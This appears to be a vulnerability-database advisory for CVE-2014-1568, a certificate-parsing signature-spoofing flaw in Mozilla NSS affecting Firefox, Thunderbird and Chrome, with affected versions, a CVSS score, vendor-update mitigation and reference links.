#VU33655 Cryptographic issues - CVE-2014-1568
Vulnerability identifier: #VU33655
Vulnerability risk: Medium
CVSSv4.0: 2.7 [CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/U:Green]
CVE-ID:
CWE-ID:
CWE-310
Exploitation vector: Network
Exploit availability: No
Description
The vulnerability allows a remote non-authenticated attacker to read and manipulate data.
Mozilla Network Security Services (NSS) before 3.16.2.1, 3.16.x before 3.16.5, and 3.17.x before 3.17.1, as used in Mozilla Firefox before 32.0.3, Mozilla Firefox ESR 24.x before 24.8.1 and 31.x before 31.1.1, Mozilla Thunderbird before 24.8.1 and 31.x before 31.1.2, Mozilla SeaMonkey before 2.29.1, Google Chrome before 37.0.2062.124 on Windows and OS X, and Google Chrome OS before 37.0.2062.120, does not properly parse ASN.1 values in X.509 certificates, which makes it easier for remote attackers to spoof RSA signatures via a crafted certificate, aka a "signature malleability" issue.
Mitigation
Install update from vendor's website.
External links
https://googlechromereleases.blogspot.com/2014/09/stable-channel-update_24.html
https://googlechromereleases.blogspot.com/2014/09/stable-channel-update-for-chrome-os_24.html
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10698
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10761
https://lists.opensuse.org/opensuse-security-announce/2014-09/msg00032.html
https://lists.opensuse.org/opensuse-security-announce/2014-09/msg00036.html
https://lists.opensuse.org/opensuse-security-announce/2014-09/msg00039.html
https://rhn.redhat.com/errata/RHSA-2014-1307.html
https://rhn.redhat.com/errata/RHSA-2014-1354.html
https://rhn.redhat.com/errata/RHSA-2014-1371.html
https://secunia.com/advisories/61540
https://secunia.com/advisories/61574
https://secunia.com/advisories/61575
https://secunia.com/advisories/61576
https://secunia.com/advisories/61583
https://www.debian.org/security/2014/dsa-3033
https://www.debian.org/security/2014/dsa-3034
https://www.debian.org/security/2014/dsa-3037
https://www.kb.cert.org/vuls/id/772676
https://www.mozilla.org/security/announce/2014/mfsa2014-73.html
https://www.novell.com/support/kb/doc.php?id=7015701
https://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html
https://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
https://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
https://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html
https://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html
https://www.securityfocus.com/bid/70116
https://www.ubuntu.com/usn/USN-2360-1
https://www.ubuntu.com/usn/USN-2360-2
https://www.ubuntu.com/usn/USN-2361-1
https://bugzilla.mozilla.org/show_bug.cgi?id=1064636
https://bugzilla.mozilla.org/show_bug.cgi?id=1069405
https://exchange.xforce.ibmcloud.com/vulnerabilities/96194
https://security.gentoo.org/glsa/201504-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
